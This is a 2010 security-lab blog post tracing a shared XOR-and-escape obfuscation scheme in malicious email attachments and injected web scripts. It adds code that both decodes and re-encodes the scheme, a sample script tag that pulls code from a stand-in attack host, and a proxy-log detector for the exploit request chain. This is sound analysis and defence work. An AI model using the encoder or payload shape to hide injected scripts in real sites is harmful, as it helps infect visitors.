June 14, 2010

Drawing similarities between email and web attacks

Chris Astacio

Websense® Security Labs™ ThreatSeeker™ Network has detected an interesting correlation between recent rounds of malicious emails and the JavaScript files being used in mass injections.  First, let's think about recent malicious email campaigns.  If you review our recent blog posts about fake virus alerts and World Cup-related malicious spam, you will see that the common theme in the two campaigns is that they contain heavily obfuscated scripts in their HTML attachments.  In fact, we've seen from our bot lab that Zeus variants seem to be responsible for these messages, as well as for a number of other messages with different subjects and themes that carry malicious HTML attachments.  The script from one of the email variants seemed oddly familiar.


Screenshot of one of the attached malicious HTML files:


Our ThreatSeeker™ Network puts us in the unique position of being able to scan both emails and malicious Web sites to gain insights like these.  Following up on another reported mass injection campaign revealed a similarity between the injected .js files on compromised sites and the email attachments that shouldn't be ignored.


Screenshot of a malicious JavaScript file used in the injection attacks:


In fact, after deobfuscating these by hand, we found that the two files use the same algorithm to deobfuscate their hidden contents.  These files fragment an obfuscated script among a number of variables in the file and concatenate them to get one long, obfuscated string.  This string then goes through a series of .replace calls to turn it into an escaped string.  Once the string is unescaped, the character code of each character is obtained and used in an XOR operation.  The resulting string of numbers from this XOR is then decoded as character codes to obtain the final, clear HTML attack code.


Step 1:  Concatenate several variables to obtain one long, obfuscated string.


Step 2:  Decipher the above string with a number of .replace actions to get an escaped string.


Step 3:  Unescape the above string to get a listing of seemingly random characters.


Step 4:  Obtain the character codes for each character in the above string.


Step 5:  XOR each of the above character codes with the key value embedded in the script to get another string of character codes.


The final step is obtaining the characters that the above codes represent.  Below are the screenshots of the final, clear script code produced by deobfuscating the email attachment and the .js files that are inserted into compromised hosts.


Screenshot of the deobfuscated email attachments:


Screenshot of the deobfuscated JavaScript attack file:
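
The six stages above, modelled end to end as an added example (this is not code from the original post or from the malicious files).  The sample payload, the XOR key "k3y", the "@@" and "~" replace tokens, the fragment size and the host name are all constructed here for illustration; the real files use their own tokens and key.  The routine returns every intermediate value so each stage can be compared with what the real script produces when stepped through in a debugger.

```javascript
// Added example (not code from the original post): a stage-by-stage model of
// the self-decoding routine described in steps 1-5 above. The sample payload,
// the XOR key "k3y", the "@@" and "~" replace tokens and the fragment size are
// all constructed here for illustration, not taken from the real files.
"use strict";

// Step 3 helper: reverse escape() output, i.e. %XX and %uXXXX sequences.
function unescapeString(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, h) =>
    String.fromCharCode(parseInt(u !== undefined ? u : h, 16)));
}

// Steps 4-5 helper: XOR a list of character codes against a repeating key.
// XOR is its own inverse, so the same function encodes and decodes.
function xorCodes(codes, key) {
  return codes.map((c, i) => c ^ key.charCodeAt(i % key.length));
}

// Runs the whole pipeline and returns every intermediate value, so each stage
// can be compared with what the real script produces in a debugger.
function deobfuscate(fragments, rules, key) {
  const joined = fragments.join("");                                        // step 1
  const escaped = rules.reduce((s, [re, to]) => s.replace(re, to), joined); // step 2
  const unescaped = unescapeString(escaped);                                // step 3
  const codes = Array.from(unescaped, (ch) => ch.charCodeAt(0));            // step 4
  const decoded = xorCodes(codes, key);                                     // step 5
  const clear = decoded.map((c) => String.fromCharCode(c)).join("");        // final step
  return { joined, escaped, unescaped, codes, decoded, clear };
}

// Inverse of the pipeline: only used here to build a constructed sample that
// has the same shape as the attachments (fragments, hidden "%", junk chars).
function obfuscate(clear, key, fragmentLen) {
  const codes = xorCodes(Array.from(clear, (ch) => ch.charCodeAt(0)), key);
  const escaped = codes.map((c) => "%" + c.toString(16).toUpperCase().padStart(2, "0")).join("");
  const hidden = escaped.replace(/%/g, "@@");          // "%" disguised as "@@"
  const junked = hidden.match(/.{1,5}/g).join("~");    // junk "~" every 5 chars
  return junked.match(new RegExp(`.{1,${fragmentLen}}`, "g"));
}

// Constructed sample. The URL shape follows the landing page seen in the post;
// the host name is made up.
const SAMPLE_CLEAR = '<script src="http://attack-site.invalid/index.php?pid=7"></script>';
const SAMPLE_KEY = "k3y";
const SAMPLE_FRAGMENTS = obfuscate(SAMPLE_CLEAR, SAMPLE_KEY, 16);
// Rule order matters: junk must go before "@@" is turned back into "%",
// because a "~" can sit between the two "@" characters.
const SAMPLE_RULES = [[/~/g, ""], [/@@/g, "%"]];

const stages = deobfuscate(SAMPLE_FRAGMENTS, SAMPLE_RULES, SAMPLE_KEY);
console.log("fragments:", SAMPLE_FRAGMENTS.length);
console.log("escaped  :", stages.escaped.slice(0, 24) + "...");
console.log("clear    :", stages.clear);
```

When working a real sample, copy the fragment variables, the .replace arguments (in the order the script applies them) and the XOR key into SAMPLE_FRAGMENTS, SAMPLE_RULES and SAMPLE_KEY; applying the replace rules in the wrong order is the most common reason a hand deobfuscation yields garbage rather than clear code.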


Now, if we follow the HTTP transactions from visiting one of the injected sites, we really begin to see that these appear to be structured as the same attack, possibly coming from the same group.  Following one example, we can see that after the browser does a GET for the injected JavaScript file, there are two more GETs for redirection proxies, until finally we land on the attack site at /index.php?pid=7.  From there, there are two further GET requests, for /Applet7.html and /Notes7.pdf.  If you review the video we posted from the malicious virus alert emails, you will find that the flow for that attack was the same, except for the redirection proxies.


Screenshot of the HTTP flow after visiting an injected site:
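
The request chain above, turned into a detection over proxy logs as an added example (not code from the original post).  The log lines, host names, client addresses and timestamps are constructed; only the URL shapes taken from the flow above (/index.php?pid=N followed by /AppletN.html and /NotesN.pdf on the same host) are from the post.  The pid value is used to tie the three requests together, which is what distinguishes this chain from an ordinary site that happens to use a pid parameter.

```javascript
// Added example (not code from the original post): flag the request chain
// described above in proxy logs. The log lines, host names, client addresses
// and timestamps are constructed; only the URL shapes (/index.php?pid=N, then
// /AppletN.html and /NotesN.pdf on the same host) are taken from the post.
"use strict";

// Constructed sample log, one request per line: "<epoch> <client> <method> <url>".
const SAMPLE_LOG = [
  "1276500000 10.0.0.5 GET http://compromised-site.invalid/page.html",
  "1276500001 10.0.0.5 GET http://compromised-site.invalid/js/inj.js",   // injected script
  "1276500002 10.0.0.5 GET http://relay-a.invalid/r.php",                // redirection proxy 1
  "1276500003 10.0.0.5 GET http://relay-b.invalid/r.php",                // redirection proxy 2
  "1276500004 10.0.0.5 GET http://attack-site.invalid/index.php?pid=7",  // landing page
  "1276500005 10.0.0.5 GET http://attack-site.invalid/Applet7.html",
  "1276500006 10.0.0.5 GET http://attack-site.invalid/Notes7.pdf",
  "1276500007 10.0.0.9 GET http://shop.invalid/index.php?pid=7",         // same URL shape, benign
  "1276500008 10.0.0.9 GET http://shop.invalid/cart.html",
];

function parseLine(line) {
  const [ts, client, method, url] = line.trim().split(/\s+/);
  const u = new URL(url);
  return { ts: Number(ts), client, method, url,
           host: u.hostname, path: u.pathname, pid: u.searchParams.get("pid") };
}

// Returns one alert per client that fetched /index.php?pid=N and then, within
// windowSec, both /AppletN.html and /NotesN.pdf from the same host. The alert
// carries the few requests before the landing page (injected .js and hops).
function findExploitChains(lines, windowSec = 30, contextLen = 3) {
  const byClient = new Map();
  for (const ev of lines.map(parseLine)) {
    if (!byClient.has(ev.client)) byClient.set(ev.client, []);
    byClient.get(ev.client).push(ev);
  }
  const alerts = [];
  for (const [client, evs] of byClient) {
    evs.sort((a, b) => a.ts - b.ts);
    evs.forEach((land, i) => {
      if (land.path !== "/index.php" || !/^\d+$/.test(land.pid ?? "")) return;
      const wanted = new Set([`/Applet${land.pid}.html`, `/Notes${land.pid}.pdf`]);
      const seen = new Set();
      for (const f of evs.slice(i + 1)) {
        if (f.ts - land.ts > windowSec) break;
        if (f.host === land.host && wanted.has(f.path)) seen.add(f.path);
      }
      if (seen.size === wanted.size) {
        alerts.push({ client, host: land.host, pid: land.pid, landedAt: land.ts,
                      chain: evs.slice(Math.max(0, i - contextLen), i).map((e) => e.url) });
      }
    });
  }
  return alerts;
}

for (const a of findExploitChains(SAMPLE_LOG)) {
  console.log(`${a.client} -> ${a.host} pid=${a.pid}; path in:`, a.chain.join(" -> "));
}
```

The chain field is the useful part of the alert: the requests immediately before the landing page are where the injected .js and the redirection proxies show up, so it points an analyst at the compromised site and the relay hosts rather than only at the final attack site.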


Websense Messaging and Websense Web Security customers are protected against these attacks.
